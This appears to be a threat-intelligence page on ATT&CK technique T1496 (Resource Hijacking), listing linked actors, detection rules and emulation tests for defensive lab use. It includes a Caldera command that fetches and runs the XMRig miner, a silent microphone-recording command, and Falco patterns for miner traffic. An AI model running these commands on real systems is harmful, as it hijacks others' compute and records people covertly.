Home/ATT&CK Technique/Resource Hijacking
ATT&CK Technique

Resource Hijacking

T1496 · impact

Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. Resource hijacking may take a number of different forms. For example, adversaries may: Leverage compute resources in order to mine cryptocurrency Sell network bandwidth to proxy networks Generate SMS traffic for profit Abuse cloud-based messaging services to send large quantities of spam messages In some cases, adversaries may leverage multiple types of Resource Hijacking at once.

WindowsIaaSLinuxmacOSContainersSaaS

Actors Using This

12
chinaAPT41
russia_apt_sandwormCaddyWiper
chinaCosmicStrand
russia_apt_sandworm_adjacentHermeticWiper
russia_apt_sandwormNotPetya
russia_apt_sandwormOlympic Destroyer
russia_apt_sandwormPrestige ransomware
russia_apt_sandwormRansomBoggs
russia_apt_sandwormSwiftSlicer
financially_motivated_cybercrime_cloud_native_cryptojacking_specialist_german_speaking_indicatorsTeamTNT (Cloud Cryptojacking Operator)
financially_motivated_italy_based_criminal_mandiant_medium_confidence_unc4990UNC4990 (Italy USB Cryptojacking Operator)
russia_apt_cadet_blizzardWhisperGate

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
execution earlier
T1569 · System Services ×8.50T1569.002 · Service Execution ×5.41
persistence earlier
T1037.003 · Network Logon Script ×19.83
discovery earlier
T1069.002 · Domain Groups ×5.29
lateral-movement earlier
T1080 · Taint Shared Content ×7.44
impact same
T1488 · Disk Content Wipe ×19.83T1499.004 · Application or System Exploitation ×11.57T1495 · Firmware Corruption ×10.68T1529 · System Shutdown/Reboot ×9.92T1565.002 · Transmitted Data Manipulation ×6.61T1561.002 · Disk Structure Wipe ×5.95T1565.001 · Stored Data Manipulation ×5.78T1561 · Disk Wipe ×5.67T1499 · Endpoint Denial of Service ×4.96
other same
T1036.001 · Invalid Code Signature ×6.61

Atomic Tests

2
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
shlinux, macosFreeBSD/macOS/Linux - Simulate CPU Load with Yes
This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. 
yes > /dev/null
powershellwindowsWindows - Simulate CPU Load with PowerShell
This test simulates high CPU load using PowerShell, commonly seen in resource hijacking. Spawns background jobs to stress CPU cores for a specified duration. 
$end = (Get-Date).AddSeconds(#{duration_seconds})
1..#{cpu_threads} | ForEach-Object { Start-Job { param($t) while((Get-Date) -lt $t) { $i=0; while($i -lt 200000){$i++} } } -ArgumentList $end }
Get-Job | Wait-Job | Remove-Job

Detection Coverage

3/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 13
Analytics (MITRE CAR) none
Runtime / container (Falco) 3
File / malware (YARA) none
Network (Suricata/Snort) 45
Vuln scan (Nuclei) none

Falco Runtime Rules

3
Container / Linux runtime detections that fire on this technique.
CRITICALDetect outbound connections to common miner pool ports
Miners usually connect to miner pools using standard ports, and this rule flags such activity. Important: Falco currently sends DNS requests to resolve miner pool domains, which could trigger other alerts. Prior to enabling this rule, it's advised to ensure whether this is acceptable for your environment. This rule is specifically disabled for that reason.
view condition
net_miner_pool and not trusted_images_query_miner_domain_dns
CRITICALDetect crypto miners using the Stratum protocol
Miners commonly specify the mining pool to connect to using a URI that starts with "stratum+tcp". However, this rule is highly specific to this technique, and matching command-line arguments can generally be bypassed quite easily.
view condition
spawned_process and (proc.cmdline contains "stratum+tcp" or
     proc.cmdline contains "stratum2+tcp" or
     proc.cmdline contains "stratum+ssl" or
     proc.cmdline contains "stratum2+ssl")
CRITICALKnown Cryptominer Process Executed
Detects execution of known cryptocurrency mining software by matching process names against a list of common miners. Cryptominers are commonly deployed by attackers after gaining initial access to monetize compromised systems. This rule complements the existing "Detect crypto miners using the Stratum protocol" rule by catching miners that may use renamed binaries but still match known miner process names. Consider tuning this rule if you have legitimate mining operations in your environment.
view condition
spawned_process and is_miner_process

Caldera Emulation

2
MITRE Caldera abilities that emulate this technique - each is an executable action for automated adversary emulation.
impactlinux, darwin, windowsCrypto (Monero) Mining
wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;
tar -xf xmrig-6.11.2-linux-x64.tar.gz;
timeout 60 ./xmrig-6.11.2/xmrig;
[ $? -eq 124 ]
impactdarwinRecord microphone
brew install sox >/dev/null 2>&1;
sox -d recording.wav trim 0 15 >/dev/null 2>&1;
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin